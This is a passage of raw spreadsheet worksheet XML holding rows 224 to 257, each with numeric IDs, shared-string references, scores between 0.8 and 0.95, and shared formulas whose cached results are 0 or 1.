      <c r="H224" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I224" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J224" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K224" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L224" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O224" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="62">
        <v>121965.0</v>
      </c>
      <c r="B225" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C225" s="63" t="s">
        <v>845</v>
      </c>
      <c r="D225" s="62" t="s">
        <v>846</v>
      </c>
      <c r="E225" s="62" t="s">
        <v>847</v>
      </c>
      <c r="F225" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G225" s="62">
        <v>0.85</v>
      </c>
      <c r="H225" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I225" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J225" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K225" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L225" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O225" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="62">
        <v>121976.0</v>
      </c>
      <c r="B226" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C226" s="63" t="s">
        <v>848</v>
      </c>
      <c r="D226" s="62" t="s">
        <v>849</v>
      </c>
      <c r="E226" s="62" t="s">
        <v>850</v>
      </c>
      <c r="F226" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G226" s="62">
        <v>0.85</v>
      </c>
      <c r="H226" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I226" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J226" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K226" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L226" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O226" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="62">
        <v>122100.0</v>
      </c>
      <c r="B227" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C227" s="63" t="s">
        <v>851</v>
      </c>
      <c r="D227" s="62" t="s">
        <v>852</v>
      </c>
      <c r="E227" s="62" t="s">
        <v>853</v>
      </c>
      <c r="F227" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G227" s="62">
        <v>0.85</v>
      </c>
      <c r="H227" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I227" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J227" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K227" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L227" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O227" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="62">
        <v>122101.0</v>
      </c>
      <c r="B228" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C228" s="63" t="s">
        <v>854</v>
      </c>
      <c r="D228" s="62" t="s">
        <v>855</v>
      </c>
      <c r="E228" s="62" t="s">
        <v>856</v>
      </c>
      <c r="F228" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G228" s="62">
        <v>0.85</v>
      </c>
      <c r="H228" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I228" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J228" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K228" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L228" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O228" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="62">
        <v>122335.0</v>
      </c>
      <c r="B229" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C229" s="63" t="s">
        <v>857</v>
      </c>
      <c r="D229" s="62" t="s">
        <v>858</v>
      </c>
      <c r="E229" s="62" t="s">
        <v>859</v>
      </c>
      <c r="F229" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G229" s="62">
        <v>0.85</v>
      </c>
      <c r="H229" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I229" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J229" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K229" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L229" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O229" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="62">
        <v>122681.0</v>
      </c>
      <c r="B230" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C230" s="63" t="s">
        <v>860</v>
      </c>
      <c r="D230" s="62" t="s">
        <v>861</v>
      </c>
      <c r="E230" s="62" t="s">
        <v>862</v>
      </c>
      <c r="F230" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G230" s="62">
        <v>0.85</v>
      </c>
      <c r="H230" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I230" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J230" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K230" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L230" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O230" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="62">
        <v>122799.0</v>
      </c>
      <c r="B231" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C231" s="63" t="s">
        <v>863</v>
      </c>
      <c r="D231" s="62" t="s">
        <v>864</v>
      </c>
      <c r="E231" s="62" t="s">
        <v>865</v>
      </c>
      <c r="F231" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G231" s="62">
        <v>0.85</v>
      </c>
      <c r="H231" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I231" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J231" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K231" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L231" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O231" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="62">
        <v>123122.0</v>
      </c>
      <c r="B232" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C232" s="63" t="s">
        <v>866</v>
      </c>
      <c r="D232" s="62" t="s">
        <v>867</v>
      </c>
      <c r="E232" s="62" t="s">
        <v>868</v>
      </c>
      <c r="F232" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G232" s="62">
        <v>0.9</v>
      </c>
      <c r="H232" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I232" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J232" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K232" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L232" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O232" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="62">
        <v>123123.0</v>
      </c>
      <c r="B233" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C233" s="63" t="s">
        <v>869</v>
      </c>
      <c r="D233" s="62" t="s">
        <v>870</v>
      </c>
      <c r="E233" s="62" t="s">
        <v>871</v>
      </c>
      <c r="F233" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G233" s="62">
        <v>0.9</v>
      </c>
      <c r="H233" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I233" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J233" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K233" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L233" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O233" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="62">
        <v>123124.0</v>
      </c>
      <c r="B234" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C234" s="63" t="s">
        <v>872</v>
      </c>
      <c r="D234" s="62" t="s">
        <v>873</v>
      </c>
      <c r="E234" s="62" t="s">
        <v>874</v>
      </c>
      <c r="F234" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G234" s="62">
        <v>0.9</v>
      </c>
      <c r="H234" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I234" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J234" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K234" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L234" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O234" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="62">
        <v>123130.0</v>
      </c>
      <c r="B235" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C235" s="63" t="s">
        <v>875</v>
      </c>
      <c r="D235" s="62" t="s">
        <v>876</v>
      </c>
      <c r="E235" s="62" t="s">
        <v>877</v>
      </c>
      <c r="F235" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G235" s="62">
        <v>0.9</v>
      </c>
      <c r="H235" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I235" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J235" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K235" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L235" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O235" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="62">
        <v>123661.0</v>
      </c>
      <c r="B236" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C236" s="63" t="s">
        <v>878</v>
      </c>
      <c r="D236" s="62" t="s">
        <v>879</v>
      </c>
      <c r="E236" s="62" t="s">
        <v>880</v>
      </c>
      <c r="F236" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G236" s="62">
        <v>0.95</v>
      </c>
      <c r="H236" s="64">
        <v>1.0</v>
      </c>
      <c r="I236" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J236" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K236" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L236" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O236" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="62">
        <v>123729.0</v>
      </c>
      <c r="B237" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C237" s="63" t="s">
        <v>881</v>
      </c>
      <c r="D237" s="62" t="s">
        <v>882</v>
      </c>
      <c r="E237" s="62" t="s">
        <v>883</v>
      </c>
      <c r="F237" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G237" s="62">
        <v>0.95</v>
      </c>
      <c r="H237" s="64">
        <v>1.0</v>
      </c>
      <c r="I237" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J237" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K237" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L237" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O237" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="62">
        <v>125668.0</v>
      </c>
      <c r="B238" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C238" s="63" t="s">
        <v>884</v>
      </c>
      <c r="D238" s="62" t="s">
        <v>885</v>
      </c>
      <c r="E238" s="62" t="s">
        <v>886</v>
      </c>
      <c r="F238" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G238" s="62">
        <v>0.9</v>
      </c>
      <c r="H238" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I238" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J238" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K238" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L238" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O238" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="62">
        <v>126156.0</v>
      </c>
      <c r="B239" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C239" s="63" t="s">
        <v>887</v>
      </c>
      <c r="D239" s="62" t="s">
        <v>888</v>
      </c>
      <c r="E239" s="62" t="s">
        <v>889</v>
      </c>
      <c r="F239" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G239" s="62">
        <v>0.9</v>
      </c>
      <c r="H239" s="64">
        <v>1.0</v>
      </c>
      <c r="I239" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J239" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K239" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L239" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O239" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="62">
        <v>126275.0</v>
      </c>
      <c r="B240" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C240" s="63" t="s">
        <v>890</v>
      </c>
      <c r="D240" s="62" t="s">
        <v>891</v>
      </c>
      <c r="E240" s="62" t="s">
        <v>892</v>
      </c>
      <c r="F240" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G240" s="62">
        <v>0.9</v>
      </c>
      <c r="H240" s="64">
        <v>1.0</v>
      </c>
      <c r="I240" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J240" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K240" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L240" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O240" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="62">
        <v>126576.0</v>
      </c>
      <c r="B241" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C241" s="63" t="s">
        <v>893</v>
      </c>
      <c r="D241" s="62" t="s">
        <v>864</v>
      </c>
      <c r="E241" s="62" t="s">
        <v>894</v>
      </c>
      <c r="F241" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G241" s="62">
        <v>0.9</v>
      </c>
      <c r="H241" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I241" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J241" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K241" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L241" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O241" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="62">
        <v>126709.0</v>
      </c>
      <c r="B242" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C242" s="63" t="s">
        <v>895</v>
      </c>
      <c r="D242" s="62" t="s">
        <v>896</v>
      </c>
      <c r="E242" s="62" t="s">
        <v>897</v>
      </c>
      <c r="F242" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G242" s="62">
        <v>0.95</v>
      </c>
      <c r="H242" s="64">
        <v>1.0</v>
      </c>
      <c r="I242" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J242" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K242" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L242" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O242" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="62">
        <v>36.0</v>
      </c>
      <c r="B243" s="62" t="s">
        <v>33</v>
      </c>
      <c r="C243" s="63" t="s">
        <v>898</v>
      </c>
      <c r="D243" s="62" t="s">
        <v>899</v>
      </c>
      <c r="E243" s="62" t="s">
        <v>900</v>
      </c>
      <c r="F243" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G243" s="62">
        <v>0.95</v>
      </c>
      <c r="H243" s="64">
        <v>1.0</v>
      </c>
      <c r="I243" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J243" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K243" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L243" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O243" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="62">
        <v>45.0</v>
      </c>
      <c r="B244" s="62" t="s">
        <v>33</v>
      </c>
      <c r="C244" s="63" t="s">
        <v>901</v>
      </c>
      <c r="D244" s="62" t="s">
        <v>902</v>
      </c>
      <c r="E244" s="62" t="s">
        <v>903</v>
      </c>
      <c r="F244" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G244" s="62">
        <v>0.9</v>
      </c>
      <c r="H244" s="64">
        <v>1.0</v>
      </c>
      <c r="I244" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J244" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K244" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L244" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O244" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="62">
        <v>52.0</v>
      </c>
      <c r="B245" s="62" t="s">
        <v>33</v>
      </c>
      <c r="C245" s="63" t="s">
        <v>904</v>
      </c>
      <c r="D245" s="62" t="s">
        <v>905</v>
      </c>
      <c r="E245" s="62" t="s">
        <v>906</v>
      </c>
      <c r="F245" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G245" s="62">
        <v>0.95</v>
      </c>
      <c r="H245" s="64">
        <v>1.0</v>
      </c>
      <c r="I245" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J245" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K245" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L245" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O245" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="62">
        <v>60.0</v>
      </c>
      <c r="B246" s="62" t="s">
        <v>33</v>
      </c>
      <c r="C246" s="63" t="s">
        <v>907</v>
      </c>
      <c r="D246" s="62" t="s">
        <v>908</v>
      </c>
      <c r="E246" s="62" t="s">
        <v>909</v>
      </c>
      <c r="F246" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G246" s="62">
        <v>0.95</v>
      </c>
      <c r="H246" s="64">
        <v>1.0</v>
      </c>
      <c r="I246" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J246" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K246" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L246" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O246" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="62">
        <v>80.0</v>
      </c>
      <c r="B247" s="62" t="s">
        <v>33</v>
      </c>
      <c r="C247" s="63" t="s">
        <v>910</v>
      </c>
      <c r="D247" s="62" t="s">
        <v>911</v>
      </c>
      <c r="E247" s="62" t="s">
        <v>912</v>
      </c>
      <c r="F247" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G247" s="62">
        <v>0.85</v>
      </c>
      <c r="H247" s="64">
        <v>0.0</v>
      </c>
      <c r="I247" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J247" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K247" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L247" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O247" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="62">
        <v>153.0</v>
      </c>
      <c r="B248" s="62" t="s">
        <v>33</v>
      </c>
      <c r="C248" s="63" t="s">
        <v>913</v>
      </c>
      <c r="D248" s="62" t="s">
        <v>914</v>
      </c>
      <c r="E248" s="62" t="s">
        <v>915</v>
      </c>
      <c r="F248" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G248" s="62">
        <v>0.85</v>
      </c>
      <c r="H248" s="64">
        <v>1.0</v>
      </c>
      <c r="I248" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J248" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K248" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L248" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M248" s="62" t="s">
        <v>916</v>
      </c>
      <c r="N248" s="62" t="s">
        <v>917</v>
      </c>
      <c r="O248" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="62">
        <v>178.0</v>
      </c>
      <c r="B249" s="62" t="s">
        <v>33</v>
      </c>
      <c r="C249" s="63" t="s">
        <v>918</v>
      </c>
      <c r="D249" s="62" t="s">
        <v>919</v>
      </c>
      <c r="E249" s="62" t="s">
        <v>920</v>
      </c>
      <c r="F249" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G249" s="62">
        <v>0.95</v>
      </c>
      <c r="H249" s="64">
        <v>1.0</v>
      </c>
      <c r="I249" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J249" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K249" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L249" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O249" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="62">
        <v>182.0</v>
      </c>
      <c r="B250" s="62" t="s">
        <v>33</v>
      </c>
      <c r="C250" s="63" t="s">
        <v>921</v>
      </c>
      <c r="D250" s="62" t="s">
        <v>922</v>
      </c>
      <c r="E250" s="62" t="s">
        <v>923</v>
      </c>
      <c r="F250" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G250" s="62">
        <v>0.9</v>
      </c>
      <c r="H250" s="64">
        <v>1.0</v>
      </c>
      <c r="I250" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J250" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K250" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L250" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O250" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="62">
        <v>183.0</v>
      </c>
      <c r="B251" s="62" t="s">
        <v>33</v>
      </c>
      <c r="C251" s="63" t="s">
        <v>924</v>
      </c>
      <c r="D251" s="62" t="s">
        <v>925</v>
      </c>
      <c r="E251" s="62" t="s">
        <v>926</v>
      </c>
      <c r="F251" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G251" s="62">
        <v>0.85</v>
      </c>
      <c r="H251" s="64">
        <v>1.0</v>
      </c>
      <c r="I251" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J251" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K251" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L251" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M251" s="62" t="s">
        <v>927</v>
      </c>
      <c r="N251" s="62" t="s">
        <v>928</v>
      </c>
      <c r="O251" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="62">
        <v>133.0</v>
      </c>
      <c r="B252" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C252" s="63" t="s">
        <v>929</v>
      </c>
      <c r="D252" s="62" t="s">
        <v>930</v>
      </c>
      <c r="E252" s="62" t="s">
        <v>931</v>
      </c>
      <c r="F252" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G252" s="62">
        <v>0.9</v>
      </c>
      <c r="H252" s="64">
        <v>1.0</v>
      </c>
      <c r="I252" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J252" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K252" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L252" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O252" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="62">
        <v>249.0</v>
      </c>
      <c r="B253" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C253" s="63" t="s">
        <v>932</v>
      </c>
      <c r="D253" s="62" t="s">
        <v>933</v>
      </c>
      <c r="E253" s="62" t="s">
        <v>934</v>
      </c>
      <c r="F253" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G253" s="62">
        <v>0.85</v>
      </c>
      <c r="H253" s="64">
        <v>0.0</v>
      </c>
      <c r="I253" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J253" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K253" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L253" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O253" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="62">
        <v>268.0</v>
      </c>
      <c r="B254" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C254" s="63" t="s">
        <v>935</v>
      </c>
      <c r="D254" s="62" t="s">
        <v>936</v>
      </c>
      <c r="E254" s="62" t="s">
        <v>937</v>
      </c>
      <c r="F254" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G254" s="62">
        <v>0.9</v>
      </c>
      <c r="H254" s="64">
        <v>1.0</v>
      </c>
      <c r="I254" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J254" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K254" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L254" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O254" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="62">
        <v>280.0</v>
      </c>
      <c r="B255" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C255" s="63" t="s">
        <v>938</v>
      </c>
      <c r="D255" s="62" t="s">
        <v>939</v>
      </c>
      <c r="E255" s="62" t="s">
        <v>940</v>
      </c>
      <c r="F255" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G255" s="62">
        <v>0.9</v>
      </c>
      <c r="H255" s="64">
        <v>1.0</v>
      </c>
      <c r="I255" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J255" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K255" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L255" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O255" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="62">
        <v>456.0</v>
      </c>
      <c r="B256" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C256" s="63" t="s">
        <v>941</v>
      </c>
      <c r="D256" s="62" t="s">
        <v>942</v>
      </c>
      <c r="E256" s="62" t="s">
        <v>943</v>
      </c>
      <c r="F256" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G256" s="62">
        <v>0.8</v>
      </c>
      <c r="H256" s="64">
        <v>1.0</v>
      </c>
      <c r="I256" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J256" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K256" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L256" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M256" s="62" t="s">
        <v>944</v>
      </c>
      <c r="N256" s="62" t="s">
        <v>945</v>
      </c>
      <c r="O256" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="62">
        <v>510.0</v>
      </c>
      <c r="B257" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C257" s="63" t="s">
        <v>946</v>
      </c>
      <c r="D257" s="62" t="s">
        <v>947</v>
      </c>
      <c r="E257" s="62" t="s">
        <v>948</v>
      </c>
      <c r="F257" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G257" s="62">
        <v>0.9</v>
      </c>
      <c r="H257" s="64">
        <v>1.0</v>
      </c>
      <c r="I257" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J257" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K257" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L257" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O257" s="62">
        <v>1.0</v>
      </c>
